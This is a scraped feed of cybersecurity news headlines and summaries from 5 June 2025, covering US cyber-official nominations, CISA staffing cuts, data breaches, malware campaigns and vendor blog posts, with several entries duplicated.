https://www.infosecurity-magazine.com/news/infosec2025-lessons-maersk-ciso/
Qualys Recognized as The Leader in Attack Surface Management by KuppingerCole
2025-06-05T18:01:29Z | 1749146489

In today’s ever-evolving security landscape, organizations face an unprecedented expansion of digital assets—and with that expansion comes a growing attack surface. We’re proud to announce that Qualys has been named The Leader in the 2025 KuppingerCole Leadership Compass for Attack Surface Management (ASM), a testament to our commitment to providing comprehensive and proactive cybersecurity solutions. […]

https://blog.qualys.com/category/product-tech
Everyone's on the cyber target list
2025-06-05T18:00:27Z | 1749146427

In this week's newsletter, Martin emphasizes that awareness, basic cyber hygiene and preparation are essential for everyone, and highlights Talos' discovery of the new PathWiper malware.

https://blog.talosintelligence.com/everyones-on-the-cyber-target-list/
The Growing Risk of Security Debt
2025-06-05T18:00:00Z | 1749146400

Security debt is emerging as a critical concern for IT and security teams. As businesses rapidly adopt new technologies, many carry forward legacy systems, unpatched software, and outdated security practices. These unresolved vulnerabilities accumulate over time and can spiral into significant risk, financial loss, and compliance failures.  This blog explores what security debt is, how it builds up, the dangers it poses, and how organizations—particularly in... Read more » The post The Growing Risk of Security Debt appeared first on Plixer.

https://www.plixer.com/blog/security-debt/
Senate Homeland panel likely to approve Cairncross, Plankey for key cyber positions
2025-06-05T17:49:00Z | 1749145740

Sean Plankey, tapped to lead CISA, did not appear at a Thursday hearing due to reported clearance-related delays, but his name was still added to a list of nominees to be voted on next week.

https://www.nextgov.com/cybersecurity/2025/06/senate-homeland-panel-likely-approve-cairncross-plankey-key-cyber-positions/405839/
Trump’s national cyber director nominee grilled about his resume, proposed spending cuts
2025-06-05T17:48:09Z | 1749145689

In his Senate confirmation hearing, national cyber director nominee Sean Cairncross faced questions about his lack of cybersecurity experience and how the government would operate with vastly reduced cybersecurity resources.

https://therecord.media/sean-cairncross-oncd-nominee-senate-confirmation-hearing
Trump’s national cyber director nominee grilled about his resume, proposed spending cuts
2025-06-05T17:48:09Z | 1749145689

In his Senate confirmation hearing, national cyber director nominee Sean Cairncross faced questions about his lack of cybersecurity experience and how the government would operate with vastly reduced cybersecurity resources.

https://therecord.media/sean-cairncross-oncd-nominee-senate-confirmation-hearing
Trump’s national cyber director nominee grilled about his resume, proposed spending cuts
2025-06-05T17:48:09Z | 1749145689

In his Senate confirmation hearing, national cyber director nominee Sean Cairncross faced questions about his lack of cybersecurity experience and how the government would operate with vastly reduced cybersecurity resources.

https://therecord.media/sean-cairncross-oncd-nominee-senate-confirmation-hearing
It’s Time to Connect Financial Security and Economic Policy
2025-06-05T17:43:52Z | 1749145432

While I’ve been in the household financial security field for two decades now, I started out planning for a career in economic policy. I majored in economics, and earned a master’s degree in economic policy, because I believe that how we design our economy is critical to whether or not all people and communities in […] The post It’s Time to Connect Financial Security and Economic Policy appeared first on The Aspen Institute.

https://www.aspeninstitute.org/blog-posts/its-time-to-connect-financial-security-and-economic-policy/
Beware of Fake Zoom Client Downloads Granting Attackers Access to Your Computer
2025-06-05T17:37:00Z | 1749145020

In the wake of the COVID-19 pandemic, collaborative tools like Microsoft Teams, Zoom, and WebEx have become indispensable for remote work, enabling seamless communication with colleagues and clients. However, their widespread adoption has also made them prime targets for cybercriminals. A recent phishing campaign exploiting the popularity of Zoom has surfaced, tricking users into downloading […] The post Beware of Fake Zoom Client Downloads Granting Attackers Access to Your Computer appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

https://gbhackers.com/beware-of-fake-zoom-client-downloads-granting-attackers/
Unsecured Database Exposes Data of 3.6 Million Passion.io Creators
2025-06-05T17:31:41Z | 1749144701

A massive data leak has put the personal information of over 3.6 million app creators, influencers, and entrepreneurs…

https://hackread.com/unsecured-database-exposes-passion-io-creators-data/
Sean Cairncross has policy coordination in mind if confirmed as national cyber director
2025-06-05T17:23:47Z | 1749144227

The nominee, who doesn’t have as much cyber experience as his predecessors, also touted his credentials and views on current threats during his Senate confirmation hearing. The post Sean Cairncross has policy coordination in mind if confirmed as national cyber director appeared first on CyberScoop.

https://cyberscoop.com/sean-cairncross-has-policy-coordination-in-mind-if-confirmed-as-national-cyber-director/
Sean Cairncross has policy coordination in mind if confirmed as national cyber director
2025-06-05T17:23:47Z | 1749144227

The nominee, who doesn’t have as much cyber experience as his predecessors, also touted his credentials and views on current threats during his Senate confirmation hearing. The post Sean Cairncross has policy coordination in mind if confirmed as national cyber director appeared first on CyberScoop.

https://cyberscoop.com/sean-cairncross-has-policy-coordination-in-mind-if-confirmed-as-national-cyber-director/
Old AT&T data leak repackaged to link SSNs, DOBs to 49M phone numbers
2025-06-05T17:21:25Z | 1749144085

A threat actor has re-released data from a 2021 AT&T breach affecting 70 million customers, this time combining previously separate files to directly link Social Security numbers and birth dates to individual users.

https://www.bleepingcomputer.com/news/security/old-atandt-data-leak-repackaged-to-link-ssns-dobs-to-49m-phone-numbers/
Stage 4 on a journey to the Self-Driving Network™: assisted
2025-06-05T17:17:22Z | 1749143842

Official Juniper Networks Blogs Stage 4 on a journey to the Self-Driving Network™: assisted At this point in our journey to the Self-Driving Network, we’ve covered data—the foundation of an AI-native network—and explored how it’s processed in the cloud and translated into insights and The post Stage 4 on a journey to the Self-Driving Network™: assisted appeared first on Official Juniper Networks Blogs.

https://blogs.juniper.net/en-us/ai-native-networking/stage-4-on-a-journey-to-the-self-driving-network-assisted
Alleged breach of Weguest – 2.5M Records Exposed via API Misconfiguration
2025-06-05T17:12:16Z | 1749143536

Alleged breach of Weguest – 2.5M Records Exposed via API Misconfiguration

https://darkwebinformer.com/alleged-breach-of-weguest-2-5m-records-exposed-via-api-misconfiguration/
WordPress Admins Cautioned About Fake Cache Plugin Stealing Admin Credentials
2025-06-05T17:11:12Z | 1749143472

A newly identified malicious plugin, dubbed “wp-runtime-cache,” has been discovered targeting WordPress sites with a sophisticated method to steal admin credentials. Disguised as a caching plugin, this malware lurks in the wp-content/plugins directory, evading detection by hiding from the WordPress admin panel’s plugin list. Unlike legitimate caching plugins that typically offer visible settings or management […] The post WordPress Admins Cautioned About Fake Cache Plugin Stealing Admin Credentials appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

https://gbhackers.com/wordpress-admins-cautioned-about-fake-cache-plugin/
BidenCash busted as Feds nuke stolen credit card bazaar
2025-06-05T17:06:27Z | 1749143187

Dark web crime platform raked in $17M+ over three years of operation Uncle Sam has seized 145 domains tied to BidenCash, the notorious dark web market that trafficked in more than 15 million stolen credit cards.

https://go.theregister.com/feed/www.theregister.com/2025/06/05/bidencash_busted/
Anthropic introduces new Claude Gov models with national security focus
2025-06-05T17:04:00Z | 1749143040

The company's custom AI models are now available for classified environments in government.

https://www.nextgov.com/acquisition/2025/06/anthropic-introduces-new-claude-gov-models-national-security-focus/405836/
Upskilling Playbook: Metrics
2025-06-05T17:00:48Z | 1749142848

Measuring the impact of upskilling is crucial for demonstrating its value and driving continuous improvement. The post Upskilling Playbook: Metrics appeared first on The Aspen Institute.

https://www.aspeninstitute.org/publications/upskilling-playbook-metrics/
Connect with us at the Gartner Security & Risk Management Summit
2025-06-05T17:00:00Z | 1749142800

Microsoft will spotlight ​​its AI-first, end-to-end security platform at the Gartner Security & Risk Management Summit. Read our blog post for details on how to connect with us there and a teaser of what to expect from our sessions.​​ The post Connect with us at the Gartner Security & Risk Management Summit appeared first on Microsoft Security Blog.

https://techcommunity.microsoft.com/blog/microsoft-security-blog/connect-with-us-at-the-gartner-security--risk-management-summit/4420744
Hacker selling critical Roundcube webmail exploit as tech info disclosed
2025-06-05T16:55:54Z | 1749142554

Hackers are actively exploiting CVE-2025-49113, a critical vulnerability in the widely used Roundcube open-source webmail application that allows remote execution.

https://www.bleepingcomputer.com/news/security/hacker-selling-critical-roundcube-webmail-exploit-as-tech-info-disclosed/
Top US cyber officials face divergent paths after Senate confirmation
2025-06-05T16:37:43Z | 1749141463

Since the start of the Trump administration, the US federal government’s two top cybersecurity leadership positions have been vacant, but those roles are finally on the path to being filled. The first job is the director of the Cybersecurity and Infrastructure Security Agency (CISA), which has been vacant since former director Jen Easterly left on Jan. 20. The second slot is the national cyber director, a role in the Executive Office of the President, last held by Harry Coker, who moved on to become the State of Maryland’s Commerce Secretary. President Trump nominated cybersecurity newcomer Sean Cairncross on Feb. 11 to succeed Coker and, a month later, named cybersecurity veteran Sean Plankey for the CISA position. Tech and cybersecurity leaders have sent Senators glowing endorsements of Plankey and Cairncross. Both candidates were slated to testify at a confirmation hearing today, but Plankey’s testimony was inexplicably canceled the day before this hearing. Although Cairncross did testify at this hearing, he will also face another confirmation hearing before the same committee on June 12, when Plankey is again scheduled to testify. The only lawmaker opposing either candidate is Senator Ron Wyden (D-OR), who is trying to hold up Plankey’s nomination to force CISA to release a report related to the Chinese threat actor Salt Typhoon. A spokesperson told CSO that Sen. Wyden’s original statement on the hold still applies. “Both of these Seans are good leaders,” Mark Montgomery, senior director of the Center on Cyber and Technology Innovation at the Foundation for the Defense of Democracies, told CSO. “Plankey, in particular, has broad expertise on the issue. Cairncross has leadership experience with the White House team. These two confirmations will set the Trump administration up for cyber success if it chooses to take it.” However, both candidates will face significant challenges once they assume their positions. The administration will be forced to play catch-up after largely overlooking most critical cyber policy issues due to turmoil caused by chaotic DOGE-induced job reductions and transitional disorientation typical of any new administration. Workforce and funding challenges The biggest challenge that Plankey will face at CISA is a dramatically reduced workforce. One report suggests that the agency has already lost 1,000 employees, or around 30% of its workforce, through buyouts, firings, and voluntary departures amid DOGE job slashing and still-lingering partisan scorn of the group’s brief work on misinformation efforts years ago. The pain of the staff cuts is compounded by the loss of experience and expertise held by staffers who have left. On May 22, CISA’s new No. 2 employee, Madhu Gottumukkala, sent a memo to staff saying that the heads of three of CISA’s six main divisions — cybersecurity, infrastructure security, and integrated operations, which oversees regional offices — were all leaving at the end of May, along with the deputy head of a fourth. The memo further said the leaders of most regional offices are also leaving, along with the top CISA officers for finance, strategy, human resources, and contracting. Some observers suggest that the staff reduction CISA has already experienced meets the estimated 1,000 CISA job cuts the administration has planned for the agency in its FY2026 budget proposal, obviating the need for any further job cuts. Montgomery, however, isn’t so sure, given the loss of leadership and rare talent. “Some of the people who’ve left, they have to replace,” he said. “My gut reaction is that they have to hire 150 people with specific skill sets, which means they may still go find another 150 to get rid of.” In addition, the administration’s budget expects CISA’s other spending outlays to drop by $535 million, or 20%. On the other hand, according to the budget, the much smaller Cyber Director’s budget should decrease by 10%, while personnel levels will stay level at 85 full-time equivalent employees. In addition to their own budget cuts, both officials will have to grapple with the fallout from reduced cyber functions across the entire federal government, from the NSA to the FBI. The FBI has recently been forced to divert resources from cybersecurity to handling immigration and border control issues. “This administration has decided to disinvest in cybersecurity and to do so in a way that is particularly damaging to the workforce,” Michael Daniel, president and CEO of the Cyber Threat Alliance, told CSO. “That’s being mirrored across the government. A lot of other agencies are also facing reductions.” He added: “Both of these individuals are going to be facing a lot of internal challenges of these cuts that have been made without necessarily a whole lot of analysis. They’re going to have holes in the workforce because it hasn’t been planned out.” Divergent strategies moving forward The road ahead appears paved with opportunity for Cairncross, while Plankey faces a narrower path of contraction and clean-up at CISA. “This is a perfect opportunity for the NCD [national cyber director] position to work,” Center on Cyber and Technology Innovation’s Montgomery said. “You have a National Security Council focused on the offensive side. You have CISA, which is focused on internally reorganizing itself. Cairncross is the first NCD to find himself in the position of having the running room to make the job work.” Montgomery emphasized, “Now is the time for Cairncross to very pointedly and aggressively go work to establish the NCD’s role as the coordinator of domestic cyber incident response to ensure that federal agencies are executing the president’s policies and budget and appropriations properly, and to work with the Hill to get whatever authority and appropriation changes are needed.” Plankey, on the other hand, is going to have to look inward to reorganize a reduced and demoralized agency. “He’s not going to be able to change the administration’s mind in the short term about reducing the overall size of CISA,” Cyber Threat Alliance’s Daniel said. “That’s not going to happen. He’s going to have to take that as a given.” Daniel advised, “He should try to say [to the President], ‘Okay, give me the latitude to get to the targets you want, but let me work with the CISA leadership. Let me work with [Homeland Security Secretary Kristi Noem]. Let me figure out how to get there.’” One certainty for both agencies is that “neither of them is going to get the opportunity to fix the influence operations problem,” Montgomery said. “We have China, Russia, and Iran running aggressive influence operations against us. For whatever reason, the Trump administration has decided that it’s censorship of Republicans. That is a false analogy, but it’s taken root. Not much we can do about it.” Despite the sunny prospects for Cairncross and the hope that Plankey can stop CISA’s downward spiral, it’s also clear that the current government’s cybersecurity policy environment is uncharted territory.   “It’s a very, very different environment than anybody that’s been working in cyber for the last 20 years has faced,” Daniel said. “We haven’t seen a government or private sector company that has said, ‘We’re going to walk away from a lot of the cyber capability and disinvest in it and abandon that capability.’ We just haven’t seen that.”

https://www.csoonline.com/article/4002117/top-us-cyber-officials-face-divergent-paths-after-senate-confirmation.html
Workday’s new dev tools help enterprises connect with external agents
2025-06-05T16:31:45Z | 1749141105

Workday has presented new developer tools to help enterprises connect its HR and finance software with external agents. The tools are an extension of the company’s Illuminate agentic AI platform, and include the Agent Gateway, AI Widgets, and expanded AI Gateway APIs. Illuminate, rolled out in September 2024, is intended to accelerate common tasks such as writing knowledge-based text, job descriptions, or contracts, providing real-time AI assistance within workflows, and making a “team” of AI experts available to users. The models behind it are powered by the 800 billion business, HR, and financial transactions made by Workday customers annually.

https://www.infoworld.com/article/4002608/workdays-new-dev-tools-help-enterprises-connect-with-external-agents.html
Why runtime security is the key to cloud protection
2025-06-05T16:21:49Z | 1749140509

Cloud security teams are caught in an endless cycle. Every day, they sift through alerts, investigate misconfigurations, and analyze theoretical risks. Stymied by information-processing, their nemesis – hackers – don’t wait. Cyber criminals move fast, exploiting live environments while security teams remain buried in posture management and pre-deployment security checks. The problem? “Most cloud security strategies focus on what could go wrong, not what is going wrong right now,” said Bryan Kissinger, PhD, CISO and SVP of Security Solutions at Trace3. “Posture management tools (CSPM) highlight misconfigurations but don’t detect active threats. Shift-left security helps reduce vulnerabilities in development, but once workloads are running, security teams often lose visibility,” Kissinger and his team at Trace3 are seeing trends of attackers exploiting identity constructs, moving laterally across cloud environments, and escalating privileges—without triggering traditional alerts. Why traditional cloud security falls short While incredibly valuable, posture management solutions focus on misconfigurations and potential impact analysis. “Traditional CSPM solutions tell teams where there could be threats. Whether in code or in the cloud, there are too many potential indicators of risk to answer one simple question, ‘what do we need to fix today?’” Kissinger said. Without runtime security, teams spend time investigating theoretical risks while real threats lurk undetected. Why runtime security is a CNAPP essential Runtime security shifts cloud defense from “what might happen” to “what’s happening now.” Instead of alerting teams about a possible misconfiguration that could be exploited, it detects initial access and actual exploitation attempts in real time. Here’s why runtime security is critical: Real-time threat detection and runtime signals – Identifies active exploits as they happen, not after they’ve caused damage.     Lateral movement visibility – Detects attackers moving laterally through cloud environments. Identity and privilege abuse monitoring – Identifies misuse of cloud identities and permissions. Correlation of risks and live attacks – Prevents alert fatigue by connecting threats to meaningful attack paths. Security isn’t just about hardening an environment; it’s about defending it while running. How Wiz delivers runtime security Wiz bridges the prevention-to-response gap with Wiz Defend, its Cloud Detection and Response (CDR/ADR) solution. Unlike traditional cloud posture management tools or runtime security tools built for securing endpoints, Wiz Defend: Detects cloud threats agentlessly in real-time across cloud, workload, Kubernetes, identity, and sensitive data layers, not just misconfigurations, reducing alert noise and prioritizing threats that represent a real risk.     Removes alert noise with vulnerabilities validated in runtime via an optional, lightweight eBPF sensor, in addition to unlocking real-time blocking, threat-hunting, and runtime forensic capabilities. Uses the Wiz Graph to correlate posture, identity, sensitive data, and developer activity with cloud & SaaS telemetry, threat intelligence, and runtime signals, giving teams a single source of truth for investigations and alert triage.                           Provides cloud-native response playbooks and one-click containment actions, so teams aren’t just alerted—they know how to respond and prevent potential incidents fast. By integrating runtime security into the CNAPP framework, Wiz ensures that security teams aren’t just managing posture—they’re actively detecting, preventing, and stopping threats. From posture to protection: Escaping the alert fatigue rabbit hole “Security teams are tired of chasing theoretical risks. Without runtime protection, they’ll continue triaging the endless stream of alerts, low-priority misconfigurations, and disconnected findings,” Kissinger said. A true CNAPP strategy isn’t just about prevention—it’s about continuous protection. See beyond static misconfigurations—detect live threats. Stop chasing alerts—correlate risk to real attack paths. Escape the noise—focus on what actually matters and address problems holistically. It’s time to stop hunting for problems and start securing what’s live. Wiz delivers cloud detection and response as part of its unified CNAPP, helping security teams protect their cloud environments and applications in real time. Want to see how Wiz Defend keeps runtime threats in check? Book a demo today. Or click here to speak with a Cloud Security expert and find out how Wiz can help.

https://www.cio.com/article/4002604/why-runtime-security-is-the-key-to-cloud-protection.html
Why Architecture Still Wins: Making SASE & SD-WAN Work Without Compromise
2025-06-05T16:20:39Z | 1749140439

The shift to cloud, SaaS, and hybrid work is no longer breaking news. What is surprising is how many IT and network teams are still trying to stitch together architectures that weren’t designed for today’s distributed world. Data is everywhere. Users are everywhere. Applications live across SaaS, public cloud, and private data centers. Yet too […] The post Why Architecture Still Wins: Making SASE & SD-WAN Work Without Compromise appeared first on Netskope.

https://www.netskope.com/blog/why-architecture-still-wins-making-sase-sd-wan-work-without-compromise
Passwordless Authentication and AI: A Look at Emerging Technologies
2025-06-05T16:14:56Z | 1749140096

The cybersecurity landscape is evolving rapidly, with two major forces reshaping how organizations think about user access: passwordless authentication and artificial intelligence (AI). While each technology offers significant security and usability improvements on its own, together, they present a compelling future for identity and access management. The Problem With Passwords Despite years of warnings, passwords… The post Passwordless Authentication and AI: A Look at Emerging Technologies appeared first on Portnox.

https://www.portnox.com/blog/security-trends/passwordless-authentication-and-ai-a-look-at-emerging-technologies/
Iran-linked hackers target Kurdish and Iraqi officials in long-running cyberespionage campaign
2025-06-05T16:06:58Z | 1749139618

The group has been operating since at least 2017, initially breaching systems belonging to the Kurdistan Regional Government and have expanded their reach to the Central Government of Iraq as well as a telecommunications provider in Uzbekistan.

https://therecord.media/iran-linked-hackers-target-kurdish-iraq-cyber-espionage
Iran-linked hackers target Kurdish and Iraqi officials in long-running cyberespionage campaign
2025-06-05T16:06:58Z | 1749139618

The group has been operating since at least 2017, initially breaching systems belonging to the Kurdistan Regional Government and have expanded their reach to the Central Government of Iraq as well as a telecommunications provider in Uzbekistan.

https://therecord.media/iran-linked-hackers-target-kurdish-iraq-cyber-espionage
Iran-linked hackers target Kurdish and Iraqi officials in long-running cyberespionage campaign
2025-06-05T16:06:58Z | 1749139618

The group has been operating since at least 2017, initially breaching systems belonging to the Kurdistan Regional Government and have expanded their reach to the Central Government of Iraq as well as a telecommunications provider in Uzbekistan.

https://therecord.media/iran-linked-hackers-target-kurdish-iraq-cyber-espionage
#Infosec2025: DNS Hijacking, A Major Cyber Threat for the UK Government
2025-06-05T16:00:00Z | 1749139200

During Infosecurity Europe 2025, Nick Woodcraft, from the UK Government, shared his experience in implementing measures to protect domains within the .gov.uk DNS namespace

https://www.infosecurity-magazine.com/news/infosec2025-dns-hijacking-uk/
How to create issues and pull requests in record time on GitHub
2025-06-05T16:00:00Z | 1749139200

Learn how to spin up a GitHub Issue, hand it to Copilot, and get a draft pull request in the same workflow you already know. The post How to create issues and pull requests in record time on GitHub appeared first on The GitHub Blog.

https://github.blog/developer-skills/github/how-to-create-issues-and-pull-requests-in-record-time-on-github/
Meet the Deputy CISOs who help shape Microsoft’s approach to cybersecurity: Part 3
2025-06-05T16:00:00Z | 1749139200

Meet the minds behind how Microsoft prioritizes cybersecurity across every team and employee. The post Meet the Deputy CISOs who help shape Microsoft’s approach to cybersecurity: Part 3 appeared first on Microsoft Security Blog.

https://www.microsoft.com/en-us/security/blog/2025/06/05/meet-the-deputy-cisos-who-help-shape-microsofts-approach-to-cybersecurity-part-3/
Why Are Cyberattacks Targeting Retail? Experts Share Their Thoughts
2025-06-05T16:00:00Z | 1749139200

Harrods, Marks & Spencer, Adidas and more — why are retailers facing this wave of cyberattacks in recent months?

https://www.securitymagazine.com/articles/101674-why-are-cyberattacks-targeting-retail-experts-share-their-thoughts
Popular Chrome Extensions Leak API Keys, User Data via HTTP and Hard-Coded Credentials
2025-06-05T15:53:00Z | 1749138780

Cybersecurity researchers have flagged several popular Google Chrome extensions that have been found to transmit data in HTTP and hard-code secrets in their code, exposing users to privacy and security risks. "Several widely used extensions [...] unintentionally transmit sensitive data over simple HTTP," Yuanjing Guo, a security researcher in the Symantec's Security Technology and Response...

https://thehackernews.com/2025/06/popular-chrome-extensions-leak-api-keys.html
How Can Deception Technology Fortify Industrial IoT Networks Against Cyber Threats?
2025-06-05T15:52:49Z | 1749138769

Explore how deception technology boosts IIoT security with early threat detection and protection for critical infrastructure. The post How Can Deception Technology Fortify Industrial IoT Networks Against Cyber Threats? appeared first on Fidelis Security.

https://fidelissecurity.com/threatgeek/deception/deception-for-iot-networks/
Alleged breach of Slate & Tell – 5M Jewelry Customer Records Exposed
2025-06-05T15:45:39Z | 1749138339

Alleged breach of Slate & Tell – 5M Jewelry Customer Records Exposed

https://darkwebinformer.com/alleged-breach-of-slate-tell-5m-jewelry-customer-records-exposed/
#Infosec2025: Ransomware Victims Urged to Engage to Take Back Control
2025-06-05T15:30:00Z | 1749137400

Engagement with ransomware actors doesn’t necessarily mean payment; it’s about getting the best outcomes, a leading negotiator had argued

https://www.infosecurity-magazine.com/news/infosec2025-ransomware-victims/
VMware security advisory (AV25-319)
2025-06-05T15:28:30Z | 1749137310

https://cyber.gc.ca/en/alerts-advisories/vmware-security-advisory-av25-319
Is your CMDB ready for the demands of today and the future?
2025-06-05T15:05:09Z | 1749135909

In today's hyper-complex, cloud-driven IT landscape, visibility isn't just a buzzword – it's the bedrock of operational success. For IT management, the challenges are mounting: sprawling cloud environments, ephemeral workloads, and the relentless pace of change can make effective management feel like an uphill battle. Get the Sageable whitepaper, Modernizing Your CMDB for IT Operational Success, now. You know the traditional Configuration Management Database (CMDB) was a foundational technology for ITSM. But let's be honest, those legacy systems, built for a static, monolithic era, are struggling to keep up with the real-time demands of dynamic cloud-native applications. Manual updates, outdated data, and a lack of integration can turn your CMDB into a "system of record" that's hopelessly out of sync with your "system of action". But what if your CMDB could be more? What if it could be the central source of truth you desperately need for efficient capacity planning, robust security, and lightning-fast incident resolution in this new era? The good news is that the CMDB is experiencing a renaissance. Forward-thinking vendors are pouring innovation into next-generation IT discovery and CMDB solutions, designed from the ground up for modern IT environments. These aren't your old, clunky databases. We're talking about dynamic, intelligent platforms that leverage cutting-edge advancements.  The CMDB of today must offer: •    Real-time accuracy you can trust, eliminating the headaches of outdated information through intelligent automation. •    Proactive resilience, helping you anticipate and prevent issues before they impact your services. •    Accelerated incident management, empowering your teams with the precise insights needed for rapid detection, triage, and remediation. •    Enhanced security and compliance, giving you granular control and immediate visibility into your IT estate. •    Seamless integration with modern tools and methodologies, from DevOps to AIOps, ensuring your CMDB supports your strategic initiatives.  These transformative capabilities are already delivering significant results for organizations, leading to dramatic improvements in response times and substantial reductions in downtime. Ready to discover how a modern CMDB can revolutionize your IT operations and improve your services?Download our whitepaper, Modernizing Your CMDB for IT Operational Success, to explore the innovations driving this CMDB renaissance and learn how you can unlock visibility, efficiency, and resilience for your IT estate. The post Is your CMDB ready for the demands of today and the future? appeared first on OpenText Blogs.

https://blogs.opentext.com/modern-cmdb-improving-it-operations-service-management/
Ukrainian police arrest hacker who used hosting firm's servers to mine cryptocurrency
2025-06-05T15:00:25Z | 1749135625

The suspect, a native of the central Ukrainian city of Poltava, had been conducting cyberattacks since at least 2018, police said.

https://therecord.media/ukrainian-police-arrest-hacker-cryptomining
Ukrainian police arrest hacker who used hosting firm's servers to mine cryptocurrency
2025-06-05T15:00:25Z | 1749135625

The suspect, a native of the central Ukrainian city of Poltava, had been conducting cyberattacks since at least 2018, police said.

https://therecord.media/ukrainian-police-arrest-hacker-cryptomining
NowSecure Responds to ‘NICKNAME’ iMessage Exploit
2025-06-05T15:00:00Z | 1749135600

iVerify recently published a detailed technical analysis uncovering a new iMessage vulnerability — dubbed “NICKNAME” — that could be used in a zero-click attack to compromise iOS devices. The exploit abuses the way iOS handles iMessage contact profile updates (nicknames) to trigger memory corruption and potentially deliver spyware without any user interaction. What We Know […] The post NowSecure Responds to ‘NICKNAME’ iMessage Exploit appeared first on NowSecure.

https://www.nowsecure.com/blog/2025/06/05/nowsecure-responds-to-nickname-imessage-exploit/
Alleged breach of Odoo S.A. – Full Employee Database (63.4MB) for Sale at $25,000
2025-06-05T14:58:15Z | 1749135495

Alleged breach of Odoo S.A. – Full Employee Database (63.4MB) for Sale at $25,000

https://darkwebinformer.com/alleged-breach-of-odoo-s-a-full-employee-database-63-4mb-for-sale-at-25-000/
The Perfect Target: Why Retail Cyberattacks Are on the Rise
2025-06-05T14:53:22Z | 1749135202

The retail sector is undergoing a digital transformation. From loyalty apps to online storefronts and data-driven advertising campaigns, retailers are leveraging technology to better understand, serve, and retain their customers. But with great data comes great responsibility—and unfortunately, growing vulnerability. Cyberattacks against the retail industry are rising at an alarming rate. In fact, recent industry… The post The Perfect Target: Why Retail Cyberattacks Are on the Rise appeared first on Portnox.

https://www.portnox.com/blog/network-security/the-perfect-target-why-retail-cyberattacks-are-on-the-rise/
Questions Swirl Around ConnectWise Flaw Used in Attacks
2025-06-05T14:48:20Z | 1749134900

ConnectWise issued a patch to stave off attacks on ScreenConnect customers, but the company's disclosures don't explain what the vulnerability is and when it was first exploited.

https://www.darkreading.com/remote-workforce/questions-swirl-connectwise-flaw-attacks
Implications of Quantum Processing for Lawful Intelligence
2025-06-05T14:48:17Z | 1749134897

Quantum Computing may enable communications that do not travel across a network in the conventional sense and endanger traditional encryption methods, carrying critical implications for lawful intelligence. The post Implications of Quantum Processing for Lawful Intelligence appeared first on SS8.

https://www.ss8.com/early-implications-of-quantum-processing-for-lawful-intelligence/
“In 10 years, all bets are off”—Anthropic CEO opposes decadelong freeze on state AI laws
2025-06-05T14:35:15Z | 1749134115

Amodei says AI "too fast" for blanket law ban; sees fundamental world change in 2 years.

https://arstechnica.com/ai/2025/06/in-10-years-all-bets-are-off-anthropic-ceo-opposes-decade-long-freeze-on-state-ai-laws/
More than a hundred backdoored malware repos traced to single GitHub user
2025-06-05T14:33:06Z | 1749133986

Someone went to great lengths to prey on the next generation of cybercrooks Sophos thinks a single person or group called "ischhfd83" is behind more than a hundred backdoored malware variants targeting novice cybercriminals and video game cheaters looking to get their hands on malicious code.

https://go.theregister.com/feed/www.theregister.com/2025/06/05/backdoored_malware_repos/
#Infosec2025: Know Your Audience to Make an Impact, CISOs Tell Their Peers
2025-06-05T14:30:00Z | 1749133800

A panel of CISOs at Infosecurity Europe urged their peers to use risk management and clear communication to tame a chaotic cyber landscape

https://www.infosecurity-magazine.com/news/infosec2025-know-your-audience/
FBI, CISA warn Play ransomware targeting critical infrastructure with evolving techniques
2025-06-05T14:29:47Z | 1749133787

The hacker group has breached hundreds of organizations and is working with others to exploit flaws in a popular remote support tool.

https://www.cybersecuritydive.com/news/fbi-cisa-play-ransomware-critical-infrastructure/749940/
FBI, CISA warn Play ransomware targeting critical infrastructure with evolving techniques
2025-06-05T14:29:47Z | 1749133787

The hacker group has breached hundreds of organizations and is working with others to exploit flaws in a popular remote support tool.

https://www.cybersecuritydive.com/news/fbi-cisa-play-ransomware-critical-infrastructure/749940/
Designing a Windows Service for Security
2025-06-05T14:20:12Z | 1749133212

Designing a security-focused Windows Service? Learn more from ThreatLocker about the core components for real-time monitoring, threat detection, and system hardening to defend against malware and ransomware.

https://www.bleepingcomputer.com/news/security/designing-a-windows-service-for-security/
How to build a robust Windows service to block malware and ransomware
2025-06-05T14:20:12Z | 1749133212

Designing a security-focused Windows Service? Learn more from ThreatLocker about the core components for real-time monitoring, threat detection, and system hardening to defend against malware and ransomware.

https://www.bleepingcomputer.com/news/security/how-to-build-a-robust-windows-service-to-block-malware-and-ransomware/
Nearly 94 Billion Stolen Cookies Found on Dark Web
2025-06-05T14:20:02Z | 1749133202

Cybersecurity experts warn of widespread data exposure as a recent investigation reveals a staggering number of internet cookies…

https://hackread.com/nearly-94-billion-stolen-cookies-on-dark-web/
Cellebrite to acquire mobile testing firm Corellium in $200 million deal
2025-06-05T14:17:24Z | 1749133044

Both companies have faced controversy in recent years, primarily for their work in circumventing mobile device security features The post Cellebrite to acquire mobile testing firm Corellium in $200 million deal appeared first on CyberScoop.

https://cyberscoop.com/cellebrite-correllium-acquisition-ios-android/
Cellebrite to acquire mobile testing firm Corellium in $200 million deal
2025-06-05T14:17:24Z | 1749133044

Both companies have faced controversy in recent years, primarily for their work in circumventing mobile device security features The post Cellebrite to acquire mobile testing firm Corellium in $200 million deal appeared first on CyberScoop.

https://cyberscoop.com/cellebrite-correllium-acquisition-ios-android/
All about that baseline: Detecting anomalies with Surveyor
2025-06-05T14:13:33Z | 1749132813

The Surveyor open source tool can help organizations establish a baseline of their environment, verify activity, and investigate anomalies.

https://redcanary.com/blog/threat-detection/detecting-anomalies-with-surveyor/
Banking groups urge SEC to rescind Biden-era cybersecurity rule
2025-06-05T14:13:00Z | 1749132780

The rule has exposed companies to liability risks while failing to provide investors with “decision-useful” information, the coalition said in a recent letter.

https://www.cybersecuritydive.com/news/banking-groups-urge-sec-rescind-breach-reporting-rule/749928/
Banking groups urge SEC to rescind Biden-era cybersecurity rule
2025-06-05T14:13:00Z | 1749132780

The rule has exposed companies to liability risks while failing to provide investors with “decision-useful” information, the coalition said in a recent letter.

https://www.cybersecuritydive.com/news/banking-groups-urge-sec-rescind-breach-reporting-rule/749928/
Bipartisan bill proposes $50M cyber threat analysis program for energy sector
2025-06-05T14:12:00Z | 1749132720

“Our national security depends on a resilient and secure energy grid,” said Sen. John Hickenlooper, D-Colo. Experts say the new effort would be welcomed by the private sector.

https://www.cybersecuritydive.com/news/bipartisan-legislation-proposes-cyber-threat-analysis-program-energy-sector/749923/
Bipartisan bill proposes $50M cyber threat analysis program for energy sector
2025-06-05T14:12:00Z | 1749132720

